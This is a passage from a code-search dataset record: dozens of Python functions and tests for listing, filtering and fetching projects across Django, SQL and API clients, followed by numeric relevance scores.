current_project_name)\n elif current_project_name != PROJECT_ALL:\n logging.error(\"Currently selected project %s not found in any changes.\"\n \" Removing from list.\", current_project_name)\n logging.debug(\"Returning list of projects: %r\", projects)\n return projects", "def test_get_project(self):\n pass", "def get_projects(self):\n res = self.conn.cursor().execute(\"SELECT * FROM projects\")\n return res.fetchall()", "def test_projects_get(self):\n response = self.client.open('/project-tracker/projects',\n method='GET')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def active_projects(self):\n return self.projects.filter(active=True)", "def get_projects(self):\n rps = self.start_date\n\n return Project.objects.filter(\n Q(active=True)\n & Q(\n Q(start_date__lte=rps)\n | Q(\n Q(start_date__gte=rps)\n & Q(start_date__lte=datetime.datetime.now().date())\n )\n | Q(start_date__isnull=True)\n )\n & Q(\n Q(end_date__gte=rps)\n | Q(end_date__isnull=True)\n )\n )", "def get_projects(self, _is_simple=False):\n req_url = f\"{self.url}/projects\"\n if _is_simple:\n req_url += \"?simple=true\"\n ret = requests.get(req_url, headers = self.req_header)\n return ret.json()", "def list_projects(ctx):\n pprint(ctx.obj.groups.get().data)", "def request_project_list(event_id):\n is_moar = bool(request.args.get('moar', type=bool))\n host_url = request.host_url\n return get_project_list(event_id, host_url, is_moar)", "def test_get_past(self, rf, projects):\n # get queryset\n request = rf.get(\"/projects/my\")\n view = MyProjectListView()\n view.setup(request)\n view.dispatch(request)\n view.get_queryset()\n qs = view.get_past()\n\n # slavic working group grant ended so it is \"past\"\n assert projects[\"slavic\"] in qs\n assert projects[\"derrida\"] not in qs\n 
assert projects[\"pliny\"] not in qs\n assert projects[\"ocampo\"] not in qs", "def project_view(request, project_id):\n\n # Retrieve the project to to be displayed. Raise an error if this project does not exist\n project = get_object_or_404(Projet, id=project_id)\n\n if request.method == 'GET':\n\n filters = Q()\n list_of_key = []\n query_string = request.META['QUERY_STRING']\n query_tab = query_string.split('&')\n filter_id_tab = []\n filter_dic = {}\n\n print(query_tab)\n\n if (query_tab != ['']):\n for query in query_tab:\n query_arg = query.split('=')\n id = query_arg[0]\n\n if not (id in filter_id_tab):\n filter_id_tab.append(id)\n try:\n filter_dic[id].append(query_arg[1])\n except KeyError:\n filter_dic[id] = [query_arg[1]]\n\n for key in request.GET:\n list_of_key.append(key)\n\n print(list_of_key)\n filters = creat_filters_rec(project, filter_dic, filter_id_tab)\n else:\n filters = Q()\n\n #\n # for key in filter_id_tab:\n #\n #\n # entry = filter_dic[key]\n #\n # if (len(entry) != 3):\n # continue\n #\n # filters = add_filter(filters, entry)\n\n tasks = project.task_set.filter(filters).order_by('-priority')\n else:\n # Retrieve all the task of the project and order them\n tasks = project.task_set.all().order_by('-priority')\n\n # Check if the logged in user is allowed to see this project\n if request.user.has_perm('taskmanager.{}_project_permission'.format(project.id)):\n status = Status.objects.all()\n users = project.members.all()\n return render(request, 'project.html', locals())\n else:\n return redirect(\"projects\")", "def get_projects(self):\n return self.http_call(\"get\", url=f\"{self.base_url}/projects\").json()", "def get_queryset(self):\r\n username = self.kwargs['username']\r\n return models.Projects.objects.filter(username = username).order_by('-id')", "def filter_projects(project_services):\n return [project for project, services in project_services.items() if \"Travis\" in services or \"GitHub\" in services]", "def get_public_projects_query():\n return Q(access_policy=AccessPolicy.OPEN)", "def get_project_list(self, dummy_project):\n # TODO: domain scope 403 is probably to do with faulty keystone policy config -- revise?\n if not self._projects:\n self._projects = self._get_keystone_client(dummy_project).projects.list()\n\n return self._projects", "def db_projects():\n return [{\"name\": \"IT\"}, {\"name\": \"Financial\"}, {\"name\": \"Failed\"}]", "def get_projects():\n if current_user.get_id() is None:\n return\n with database.engine.begin() as connection:\n result = connection.execute(select(\n [models.projects.c.project_id, models.projects.c.name, models.projects.c.path, models.projects.c.creation_date, models.projects.c.user_id, func.count(models.objects.c.object_id).label('object_count')])\n .select_from(models.projects.outerjoin(models.objects))\n .where(and_(models.projects.c.active == True, models.projects.c.user_id == current_user.id))\n .group_by(models.projects.c.project_id)\n .order_by(models.projects.c.project_id))\n projects = [dict(row) for row in result]\n for project in projects:\n user = models.User.query.filter_by(\n id=project['user_id']).first()\n if user:\n project['email'] = user.email\n return projects", "def projects(request):\n projects = (\n Project.objects.visible()\n .visible_for(request.user)\n .prefetch_related(\"latest_translation__user\")\n .order_by(\"name\")\n )\n\n if not projects:\n return render(request, \"no_projects.html\", {\"title\": \"Projects\"})\n\n return render(\n request,\n \"projects/projects.html\",\n 
{\"projects\": projects, \"top_instances\": projects.get_top_instances()},\n )", "def projects_view(request):\n\n # The projects to be displayed. Only the ones in which the logged in user is involved\n projects = request.user.projets.all().order_by('name')\n return render(request, 'projects.html', locals())", "def list_projects():\n if '.wcscanner' not in os.listdir(context.__BASE_PATH__):\n return []\n return os.listdir(context.__PROJECTS_PATH__)", "def get_projects(self):\n session = self.session_factory()\n results = [row.project for row in session.query(PipelineRun.project.distinct().label('project')).all()]\n session.close()\n return results", "def filter_queryset(self, request, queryset, view):\n user = request.user\n project_id = view.kwargs.get(view.lookup_field)\n\n if user.is_anonymous:\n return queryset.filter(Q(shared=True))\n\n if project_id:\n int_or_parse_error(\n project_id,\n \"Invalid value for project_id. It must be a positive integer.\",\n )\n\n # check if project is public and return it\n try:\n project = queryset.get(id=project_id)\n except ObjectDoesNotExist as non_existent_object:\n raise Http404 from non_existent_object\n\n if project.shared:\n return queryset.filter(Q(id=project_id))\n\n return super().filter_queryset(request, queryset, view)", "def project_filter(filename):\n return 'projects' in filename", "def get_projects(self):\n response = self.request(verb=requests.get, address=\"projects\")\n # FIXME: if no results, must we raise an exception?\n return response[\"results\"] if \"results\" in response else response", "def _get_resource_projects(resource):\n resource_type = resource.get('type', '').upper()\n resource_values = resource.get('include', tuple())\n\n projects = tuple()\n if resource_type == _FOLDER:\n projects = _get_folder_projects(resource_values)\n elif resource_type == _PROJECT:\n projects = _get_projects(resource_values)\n elif resource_type == _FILTER:\n projects = _get_filtered_projects(resource_values)\n else:\n logging.info('Projects: No projects for resource %s', resource_type)\n return projects", "def test_get_projects(self):\n for project in ['TEST', 'NEWTEST', 'MYPROJECT']:\n self.db.insert_single_result(generate_mock_result(project=project))\n projects = self.db.get_projects()\n self.assertItemsEqual(['MYPROJECT', 'NEWTEST', 'TEST'], projects)", "def list(self, request, *args, **kwargs):\n project = Project.objects.get(id=kwargs[\"projects_pk\"])\n self.check_object_permissions(request, project)\n return super().list(request, args, kwargs)", "def get_queryset(self):\n path_issue = str(self.request.path).split(\"/projects/\")[1]\n projects_pk = int(path_issue.split(\"/\")[0])\n\n return Contributor.objects.filter(project=projects_pk)", "def get_client_projects(self, client=None):\n if type(client) is Client:\n return [p for p in self.project_list if client.client_id == p.client_id]", "def test_show_project_list(self):\n fake_project = FakeResource(1)\n\n # This mocks is faking keystone retrieving a defined list of\n # projects\n patch('identity.views.Keystone.project_list',\n Mock(return_value=[fake_project])).start()\n\n render_mock = patch(\n 'identity.views.ListProjectView.render_to_response').start()\n\n response = self.view(self.request)\n\n render_args = render_mock.call_args[0][0]\n computed = render_args['projects'][0]\n\n self.assertEqual(computed, fake_project.to_dict())", "def filter_projects(self, query, check=True):\n page_projects = self._page_projects()\n\n page_projects.field_filter_projects.value = query\n 
page_projects.button_filter_projects.click()\n\n if check:\n\n def check_rows():\n is_present = False\n for row in page_projects.table_projects.rows:\n if not (row.is_present and\n query in row.link_project.value):\n break\n is_present = True\n\n return waiter.expect_that(is_present, equal_to(True))\n\n waiter.wait(check_rows,\n timeout_seconds=10,\n sleep_seconds=0.1)", "def _page_projects(self):\n return self._open(self.app.page_projects)", "def do_projects(self, arg):\n args = shlex.split(arg)\n limit = 10\n from_date = to_date = ''\n if args:\n limit = 0\n try:\n from_date, to_date = helpers.parse_date_parameters(args)\n except ValueError, msg:\n print(msg)\n return\n projects = self.db.get_projects_with_activity_field(\n from_date, to_date, limit=limit)\n refined = map(lambda x: [\n x['pid'], x['name'],\n '[Active]' if x['active'] else '[closed]',\n datetime.datetime.strftime(x['created'], '%c').decode('utf8'),\n x['description']], projects)\n print(tabulate(refined, ['ID', 'Project', 'Activity', 'Created',\n 'Description']))", "def find_projects(self, project_name: Optional[str] = None) -> List[Project]:\n with self.table_access_condition:\n conn = self._get_connection()\n c = conn.cursor()\n c.execute(\n \"\"\"\n SELECT * from projects\n WHERE (?1 IS NULL OR project_name = ?1)\n \"\"\",\n (project_name,),\n )\n rows = c.fetchall()\n return [\n Project(self, str(r[\"project_id\"]), row=r, _used_new_call=True)\n for r in rows\n ]", "def projects_with_tag(request, tag):\n return tag.project_set.filter(user=request.user)", "def list_projects():\n with BMI(_username, _password, constants.BMI_ADMIN_PROJECT) as bmi:\n ret = bmi.list_projects()\n if ret[constants.STATUS_CODE_KEY] == 200:\n table = PrettyTable(\n field_names=[\"Id\", \"Name\", \"Provision Network\"])\n projects = ret[constants.RETURN_VALUE_KEY]\n for project in projects:\n table.add_row(project)\n click.echo(table.get_string())\n else:\n click.echo(ret[constants.MESSAGE_KEY])", "def getprojects(self):\n resp = self.conn.request('GET', self.URLS['allprojects'], dict(api_key=self.api_key))\n data = resp.data.decode('utf-8')\n jdata = json.loads(data)['projects']\n # Convert nested JSON documents\n for project_index in range(len(jdata)):\n for field in ('options_json', 'templates_json'):\n jdata[project_index][field] = json.loads(jdata[project_index][field])\n # Pass project details dictionaries to constructors, return array\n return [PhProject(self, project) for project in jdata]", "def project_list(self):\n try:\n ids = self.request[api.DATA][api.DATA][\"ids\"]\n return self._get_keystone_projects(ids)\n except Exception as e:\n LOG.exception(\"Error occurred: %s\" % e)", "def get_projects(self):\n unaligned_path = self.get_unaligned_path()\n logger.debug(\"collecting list of projects\")\n return [p for p in os.listdir(unaligned_path)\n if len(parsing.get_project_label(p))]", "def all(cls):\n projects_url = 'https://www.pivotaltracker.com/services/v5/projects'\n root = _perform_pivotal_get(projects_url)\n if root is not None:\n return [Project.from_json(project_node) for project_node in root]", "def list_projects():\n\n cmd = dict()\n cmd[\"type_\"] = \"list_projects\"\n cmd[\"name_\"] = \"\"\n \n s = comm.send_and_receive_socket(cmd)\n\n msg = comm.recv_string(s)\n\n if msg != \"Success!\":\n raise Exception(msg)\n \n json_str = comm.recv_string(s) \n \n s.close() \n\n return json.loads(json_str)[\"projects\"]", "def test_get_queryset(self, rf, projects):\n request = rf.get(\"/projects/my\")\n view = MyProjectListView()\n 
view.setup(request)\n view.dispatch(request)\n qs = view.get_queryset()\n\n # should be ordered by newest grant\n assert qs[0] == projects[\"derrida\"] # RPG started 1yr ago\n assert qs[1] == projects[\"pliny\"] # started 400 days ago\n assert qs[2] == projects[\"ocampo\"] # started 450 days ago\n assert qs[3] == projects[\"slavic\"] # seed grant 2yrs ago", "def projects(self):\n campaigns = self.campaigns.all()\n return Project.published_objects.filter(campaigns__in=campaigns)", "def get_projects(cls):\n projects = []\n for project in Project.select():\n project_dict = {\n \"id\": project.id,\n \"title\": project.title,\n \"link\": project.link,\n \"description\": project.description\n }\n projects.append(project_dict)\n return projects", "def get_queryset(self):\n queryset = Project.objects.filter(contributor__user=self.request.user.pk)\n return queryset", "def list(self, *args, **kwargs):\n projects = Project.objects.all()\n return self.list_by(projects, self.serializer_class)", "def do_project_list(cs, args):\n _, projects = cs.projects.list()\n fields = [\n 'project_id',\n 'name',\n 'owner_id',\n 'current_user_role_id',\n 'repo_count',\n 'creation_time',\n 'public',\n ]\n utils.print_list(projects, fields, formatters={}, sortby=args.sortby)", "def getSubProjects(self):\n logger.debug(\"Func: getSubProjects\")\n\n return self._subProjectsList", "def test_read_project(self):\n pass", "def test_read_project(self):\n pass", "def test_project_list_with_projects(self):\n # Add test projects.\n first_project = add_project(title='Title 1', description='Description 1')\n second_project = add_project(title='Title 2', description='Description 2')\n\n # Check that project list contains test projects.\n response = self.client.get(reverse('portfolio:project_list'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, first_project.title)\n self.assertContains(response, first_project.description)\n self.assertContains(response, second_project.title)\n self.assertContains(response, second_project.description)", "def get_project(self, project):\n return Dict(self.projects.get_entry(pk=project, _fields=[\"_all\"]).result())", "def get_all_projects():\n return jsonify(admin.get_all_projects(current_app.scoped_session()))", "def get_projects():\n data = sql.list_projects()\n names = [(d['id'], d['name']) for d in data]\n return names", "def test_returns_all_projects_if_difficulty_set_to_all(self):\n # Arrange\n self.test_project_2.private = False\n # Set difficulty of test_project_2 to easy.\n self.test_project_2.difficulty = ProjectDifficulty.EASY.value\n self.test_project_2.save()\n self.test_project_1.difficulty = ProjectDifficulty.MODERATE.value\n self.test_project_1.save()\n test_project_4 = Project.clone(self.test_project_2.id, self.test_author.id)\n test_project_4.status = ProjectStatus.PUBLISHED.value\n test_project_4.difficulty = ProjectDifficulty.CHALLENGING.value\n test_project_4.save()\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"difficulty\": \"ALL\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n # User is only permitted for test_project 1, 2 and 4, since test_project_3 is DRAFT.\n self.assertEqual(len(response.json[\"results\"]), 3)\n self.assertNotIn(\n self.test_project_3.id, [i[\"projectId\"] for i in response.json[\"results\"]]\n )", "def project_list(ctx, parent_project_id, output_format, columns):\n data = ctx.obj.get_projects(parent_project_id=parent_project_id)\n 
if output_format == 'table':\n column_names = columns.split(',')\n output_table(column_names, data['project'])\n elif output_format == 'json':\n output_json_data(data)", "def get_created_projects(self):\n project_ouessant1 = Project.objects.get(name='Ouessant Tidal Power Phase I')\n project_ouessant2 = Project.objects.get(name='Ouessant Tidal Power Phase II')\n project_liaoning = Project.objects.get(\n name='Liaoning Linghai China Resource Power Wind Power Wind Farm'\n )\n return [project_ouessant1, project_ouessant2, project_liaoning]", "def open_projects_user(user):\n return Project.objects.prefetch_related('task_set').filter(user=user, open=True)", "def get_project(self, i):\r\n return self.__projects[i]", "def get_project(abort_not_found=True, **project_filters):\n return get_resource(\n Project.query.filter_by(**project_filters), abort_not_found)", "def list_projects(arn=None, nextToken=None):\n pass", "def projects():\n response = jsonify(projects_service.get_top_level_projects_ids())\n return response", "def list_(ctx, search, backend):\n projects = ctx.obj['projects_db'].search(search, backend=backend)\n projects = sorted(projects, key=lambda project: project.name.lower())\n ctx.obj['view'].search_results(projects)", "def test_search_project(self):\n title = Project.search_project(\"dee\")\n self.assertTrue(len(title) > 0)", "def project_show(ctx, args):\n for project_id in args:\n data = ctx.obj.get_project_by_project_id(project_id)\n output_json_data(data)", "def get_projects(self):\n return self.jira.projects()", "def get_projects_data():\n wcscanner_path = context.__BASE_PATH__ + '/.wcscanner'\n\n data = []\n for project in os.listdir(wcscanner_path):\n if (os.path.isdir(os.path.join(wcscanner_path, project))):\n update_project_data(project)\n project_path = '{}/{}'.format(wcscanner_path, project)\n f = open('{}/.project'.format(project_path), 'r')\n data.append(json.load(f))\n f.close()\n return data", "def getProjects(self):\n catalog = plone.api.portal.get_tool('portal_catalog')\n path = '{}/projects'.format('/'.join(plone.api.portal.get().getPhysicalPath()))\n query = dict(portal_type='Project', sort_on='sortable_title', path=path)\n result = list()\n for brain in catalog(**query):\n result.append((brain.getId, brain.Title))\n return result", "def projects(self):\n sql = \"\"\"SELECT project\n FROM barcodes.sample\n LEFT JOIN barcodes.project_sample_sets USING (sample_set_id)\n LEFT JOIN barcodes.project USING (project_id)\n WHERE sample_id = %s\n UNION\n SELECT project\n FROM barcodes.project_samples\n LEFT JOIN barcodes.project USING (project_id)\n WHERE sample_id = %s\n \"\"\"\n with pm.sql.TRN:\n pm.sql.TRN.add(sql, [self.id, self.id])\n projects = pm.sql.TRN.execute_fetchflatten()\n return None if not projects else projects", "def test_returns_limit_projects(self):\n # Arrange\n # Create and arrange test projects\n self.arrange_projects()\n # Act\n response = self.client.get(\n f\"{self.url}?limit=1\", headers={\"Authorization\": self.user_session_token}\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 1)", "def tasks_in_project(request, project):\n return project.task_set.filter(user=request.user).exclude(folder='trash')" ]
[ "0.740072", "0.7351347", "0.7287984", "0.7287984", "0.72771144", "0.72143286", "0.7165112", "0.71590155", "0.7144451", "0.7075294", "0.7046728", "0.7021743", "0.70181876", "0.69926757", "0.698769", "0.6950364", "0.6894256", "0.68472075", "0.6795028", "0.67938405", "0.6792199", "0.6790819", "0.6777117", "0.6760707", "0.67518044", "0.6746114", "0.6744328", "0.6696477", "0.66728646", "0.6671634", "0.6659477", "0.6656171", "0.66390216", "0.6622481", "0.6599618", "0.65928954", "0.65919966", "0.65817", "0.6575259", "0.65705585", "0.65633655", "0.6561332", "0.6558603", "0.65510863", "0.6542315", "0.65316695", "0.65068007", "0.650215", "0.64821005", "0.64722556", "0.64634764", "0.64629453", "0.64427775", "0.6423464", "0.64226055", "0.641437", "0.63965106", "0.63937485", "0.6371165", "0.636825", "0.63564813", "0.6355311", "0.6339037", "0.6334161", "0.6321628", "0.6315338", "0.6295609", "0.6294056", "0.62921757", "0.62894064", "0.628858", "0.6266074", "0.626088", "0.62158924", "0.6205308", "0.620243", "0.6199477", "0.6199272", "0.6199272", "0.6199085", "0.6198536", "0.6197399", "0.61773384", "0.6168974", "0.61686397", "0.61685675", "0.616341", "0.61527765", "0.6148813", "0.61446506", "0.614237", "0.6133948", "0.6131722", "0.6125794", "0.6112855", "0.61086726", "0.61044526", "0.6103823", "0.6097707", "0.60891527" ]
0.829477
0
fetcher.get_projects() should error if filter is invalid
def test_get_projects_throws_if_project_does_not_exist(fc: fetcher.Fetcher):
    with pytest.raises(exceptions.NotFoundError) as exc:
        fc.get_projects("BadProject")
    assert "An error occured while getting projects." in str(exc.value)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_projects_filters(fc: fetcher.Fetcher, test_project_name):\n projects = fc.get_projects(test_project_name)\n assert isinstance(projects, list)\n assert len(projects) == 1\n assert projects[0].name == test_project_name", "def _get_filtered_projects(filters):\n projects_itr = (projects_lib.get_filtered(f) for f in filters)\n return itertools.chain.from_iterable(projects_itr)", "def test_get_project_list_with_no_projects(self):\n result = get_project_list()\n self.assertQuerysetEqual(result['projects'].object_list, [])\n self.assertIsNone(result['tag'])\n self.assertFalse(result['filtered'])", "def test_get_projects(self):\n pass", "def filter_projects():\n with open('../results/01.crawling/01.project_ci_services.json', 'r') as infile:\n projects = json.load(infile)\n tr_projects = []\n for project, value in projects.items():\n if \"GitHub\" in value or \"Travis\" in value:\n tr_projects.append(project)\n return tr_projects", "def test_list_project_request(self):\n pass", "def test_list_projects(self):\n pass", "def test_list_projects(self):\n pass", "def test_get_projects_returns_projects(fc: fetcher.Fetcher):\n projects = fc.get_projects()\n assert isinstance(projects, list)\n assert isinstance(projects[0], models.Project)", "def _get_projects(filters):\n # First order the objects, so separate that out\n orders_query = [o for o in filters if o['type']=='order']\n # Filter objects next, so separate those out\n filters_query = [f for f in filters if f['type']=='filter']\n\n projects = Project.objects.all()\n # We need a dictonary to pass to Django's filter function\n query_dict = {}\n # Order the projects based on the ordering queries\n for orders in orders_query:\n projects = projects.order_by(orders['property'])\n # create the dictonary based on the filtering queries\n for filters in filters_query:\n # First, if we want to filter by user, find the user\n if filters['property'] =='user':\n try:\n user_p = UserProfile.objects.get(email=filters['value'])\n query_dict[filters['property']] = user_p\n except UserProfile.DoesNotExist:\n raise Http404(\"User does not exist\")\n # Second, if the filter is by tags, change the query phrase\n # to 'tags__tag_name' - this is because tags is a ManyToManyField\n # and we want to search by the tag_name property of Tag objects\n elif filters['property'] == 'tags':\n filters['property'] = 'tags__tag_name'\n query_dict[filters['property']] = filters['value']\n else:\n # Make a dictionary, property: value, and you can pass it to filter fn\n query_dict[filters['property']] = filters['value']\n projects = projects.filter(**query_dict)\n return projects", "def test_get_project_list_with_tag_filter(self):\n # Add test projects.\n tag = 'tag1'\n projects_with_tag = [\n add_project(title='1', description='1', tags=[tag]),\n add_project(title='2', description='2', tags=[tag]),\n ]\n project_without_tag = add_project(title='3', description='3', tags=[])\n\n result = get_project_list(tag=tag)\n result_projects = result['projects'].object_list\n\n # Make sure only projects with tag are retrieved.\n for project_with_tag in projects_with_tag:\n self.assertTrue(project_with_tag in result_projects)\n self.assertFalse(project_without_tag in result_projects)\n self.assertEqual(len(result_projects), len(projects_with_tag))\n self.assertTrue(result['filtered'])\n self.assertEqual(result['tag'], tag)", "def test_get_project_list_with_projects(self):\n # Add two test projects.\n projects = [\n add_project(title='1', description='1'),\n add_project(title='2', 
description='2'),\n ]\n\n result = get_project_list()\n result_projects = result['projects'].object_list\n\n # Make sure two test projects are retrieved.\n for project in projects:\n self.assertTrue(project in result_projects)\n self.assertEqual(len(result_projects), len(projects))\n self.assertIsNone(result['tag'])\n self.assertFalse(result['filtered'])", "def _get_projects(project_ids):\n if _ALL in project_ids:\n return projects_lib.get_all()\n return projects_lib.get_selective(project_ids)", "def test_list_project(self):\n pass", "def query_projects(request):\n try:\n filters = request.data\n except AttributeError:\n filters = FILTER\n projects = _get_projects(filters)\n projects_as_json = serializers.serialize('json', projects)\n return HttpResponse(json.dumps(projects_as_json), content_type='json')", "def project_view(request, project_id):\n\n # Retrieve the project to to be displayed. Raise an error if this project does not exist\n project = get_object_or_404(Projet, id=project_id)\n\n if request.method == 'GET':\n\n filters = Q()\n list_of_key = []\n query_string = request.META['QUERY_STRING']\n query_tab = query_string.split('&')\n filter_id_tab = []\n filter_dic = {}\n\n print(query_tab)\n\n if (query_tab != ['']):\n for query in query_tab:\n query_arg = query.split('=')\n id = query_arg[0]\n\n if not (id in filter_id_tab):\n filter_id_tab.append(id)\n try:\n filter_dic[id].append(query_arg[1])\n except KeyError:\n filter_dic[id] = [query_arg[1]]\n\n for key in request.GET:\n list_of_key.append(key)\n\n print(list_of_key)\n filters = creat_filters_rec(project, filter_dic, filter_id_tab)\n else:\n filters = Q()\n\n #\n # for key in filter_id_tab:\n #\n #\n # entry = filter_dic[key]\n #\n # if (len(entry) != 3):\n # continue\n #\n # filters = add_filter(filters, entry)\n\n tasks = project.task_set.filter(filters).order_by('-priority')\n else:\n # Retrieve all the task of the project and order them\n tasks = project.task_set.all().order_by('-priority')\n\n # Check if the logged in user is allowed to see this project\n if request.user.has_perm('taskmanager.{}_project_permission'.format(project.id)):\n status = Status.objects.all()\n users = project.members.all()\n return render(request, 'project.html', locals())\n else:\n return redirect(\"projects\")", "def test_get_past(self, rf, projects):\n # get queryset\n request = rf.get(\"/projects/my\")\n view = MyProjectListView()\n view.setup(request)\n view.dispatch(request)\n view.get_queryset()\n qs = view.get_past()\n\n # slavic working group grant ended so it is \"past\"\n assert projects[\"slavic\"] in qs\n assert projects[\"derrida\"] not in qs\n assert projects[\"pliny\"] not in qs\n assert projects[\"ocampo\"] not in qs", "def test_get_project_list_with_page_filter(self):\n # Add test projects.\n projects = [\n add_project(title=str(i), description=str(i)) for i in range(10)\n ]\n pages = {\n 1: projects[5:],\n 2: projects[:5],\n }\n\n # Check first page results.\n result = get_project_list(page=1)\n first_page_results = result['projects'].object_list\n for first_page_project in pages[1]:\n self.assertTrue(first_page_project in first_page_results)\n self.assertFalse(\n any(project in first_page_results for project in pages[2]))\n\n # Check second page results.\n result = get_project_list(page=2)\n second_page_results = result['projects'].object_list\n self.assertFalse(\n any(project in second_page_results for project in pages[1]))\n for second_page_project in pages[2]:\n self.assertTrue(second_page_project in 
second_page_results)", "def filter_projects(project_services):\n return [project for project, services in project_services.items() if \"Travis\" in services or \"GitHub\" in services]", "def project_filter(filename):\n return 'projects' in filename", "def test_returns_all_projects_if_difficulty_set_to_all(self):\n # Arrange\n self.test_project_2.private = False\n # Set difficulty of test_project_2 to easy.\n self.test_project_2.difficulty = ProjectDifficulty.EASY.value\n self.test_project_2.save()\n self.test_project_1.difficulty = ProjectDifficulty.MODERATE.value\n self.test_project_1.save()\n test_project_4 = Project.clone(self.test_project_2.id, self.test_author.id)\n test_project_4.status = ProjectStatus.PUBLISHED.value\n test_project_4.difficulty = ProjectDifficulty.CHALLENGING.value\n test_project_4.save()\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"difficulty\": \"ALL\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n # User is only permitted for test_project 1, 2 and 4, since test_project_3 is DRAFT.\n self.assertEqual(len(response.json[\"results\"]), 3)\n self.assertNotIn(\n self.test_project_3.id, [i[\"projectId\"] for i in response.json[\"results\"]]\n )", "def get_projects(selection):\n project=[]\n\n # project with keyname\n\n if 'project' in selection.facets:\n project+=selection.facets['project']\n\n\n # project without keyname\n\n # WARNING\n #\n # The code below uses sdinference and query the database to retrieve ESGF parameters.\n # Doing those things here may raise circular dependencies\n # as well as making the whole thing very complex.\n #\n # We do this to make this syntax work (i.e. project value without key)\n # synda search GeoMIP\n #\n # Note that this syntax always works (i.e. 
load the project level default file), even without this code.\n # synda search project=GeoMIP\n #\n #\n pending_projects=sdearlystreamutils.get_facet_values_early([selection.facets],'project',extract_item=True) # project without keyname or project as part of an identifier.\n\n li=pending_projects+project\n\n li=list(set(li)) # remove duplicate\n\n return li", "def filter_projects(self, query, check=True):\n page_projects = self._page_projects()\n\n page_projects.field_filter_projects.value = query\n page_projects.button_filter_projects.click()\n\n if check:\n\n def check_rows():\n is_present = False\n for row in page_projects.table_projects.rows:\n if not (row.is_present and\n query in row.link_project.value):\n break\n is_present = True\n\n return waiter.expect_that(is_present, equal_to(True))\n\n waiter.wait(check_rows,\n timeout_seconds=10,\n sleep_seconds=0.1)", "def test_get_projects_expanded(self):\n pass", "def get_project(abort_not_found=True, **project_filters):\n return get_resource(\n Project.query.filter_by(**project_filters), abort_not_found)", "def _get_resource_projects(resource):\n resource_type = resource.get('type', '').upper()\n resource_values = resource.get('include', tuple())\n\n projects = tuple()\n if resource_type == _FOLDER:\n projects = _get_folder_projects(resource_values)\n elif resource_type == _PROJECT:\n projects = _get_projects(resource_values)\n elif resource_type == _FILTER:\n projects = _get_filtered_projects(resource_values)\n else:\n logging.info('Projects: No projects for resource %s', resource_type)\n return projects", "def test_get_project(self):\n pass", "def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):\n ml = fc.get_models(project=test_project_name)\n assert all(m.project_name == test_project_name for m in ml)\n\n ml = fc.get_models(model=test_model[\"name\"])\n assert all(m.name == test_model[\"name\"] for m in ml)\n\n ml = fc.get_models(project=test_project_name, model=test_model[\"name\"])\n assert all(\n m.project_name == test_project_name and m.name == test_model[\"name\"] for m in ml\n )", "def get_projects(self, *criterion):\n from wkcdd.models.helpers import get_project_list\n return get_project_list([self.id], *criterion)", "def test_returns_projects_filter_by_mapping_types(self):\n # Arrange\n self.test_project_1.mapping_types = [MappingTypes.BUILDINGS.value]\n self.test_project_1.save()\n # Set project_2 to be allowed for all users removing as private.\n self.test_project_2.mapping_types = [MappingTypes.ROADS.value]\n self.test_project_2.private = False\n self.test_project_2.save()\n # Set mapping type of test_project_3 to waterways.\n self.test_project_3.mapping_types = [MappingTypes.WATERWAYS.value]\n self.test_project_3.status = ProjectStatus.PUBLISHED.value\n self.test_project_3.save()\n # Create a new project with other mapping type.\n\n test_project_4 = TestProjectsAllAPI.create_cloned_project_with_mapping_types(\n self.test_project_3.id, self.test_author.id, [MappingTypes.LAND_USE.value]\n )\n # Create a new project with land use mapping type.\n test_project_5 = TestProjectsAllAPI.create_cloned_project_with_mapping_types(\n self.test_project_3.id, self.test_author.id, [MappingTypes.OTHER.value]\n )\n # Create a new project with all mapping types.\n test_project_6 = TestProjectsAllAPI.create_cloned_project_with_mapping_types(\n self.test_project_3.id,\n self.test_author.id,\n [\n MappingTypes.BUILDINGS.value,\n MappingTypes.ROADS.value,\n MappingTypes.WATERWAYS.value,\n 
MappingTypes.LAND_USE.value,\n MappingTypes.OTHER.value,\n ],\n )\n\n # Act\n response_buildings = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.BUILDINGS.name]},\n )\n # Assert\n self.assertEqual(response_buildings.status_code, 200)\n self.assertEqual(len(response_buildings.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_buildings.json[\"results\"]],\n [self.test_project_1.id, test_project_6.id],\n )\n\n # Act\n response_roads = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.ROADS.name]},\n )\n # Assert\n self.assertEqual(response_roads.status_code, 200)\n self.assertEqual(len(response_roads.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_roads.json[\"results\"]],\n [self.test_project_2.id, test_project_6.id],\n )\n\n # Act\n response_waterways = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.WATERWAYS.name]},\n )\n # Assert\n self.assertEqual(response_waterways.status_code, 200)\n self.assertEqual(len(response_waterways.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_waterways.json[\"results\"]],\n [self.test_project_3.id, test_project_6.id],\n )\n\n # Act\n response_land_use = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.LAND_USE.name]},\n )\n # Assert\n self.assertEqual(response_land_use.status_code, 200)\n self.assertEqual(len(response_land_use.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_land_use.json[\"results\"]],\n [test_project_4.id, test_project_6.id],\n )\n\n # Act\n response_other = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.OTHER.name]},\n )\n # Assert\n self.assertEqual(response_other.status_code, 200)\n 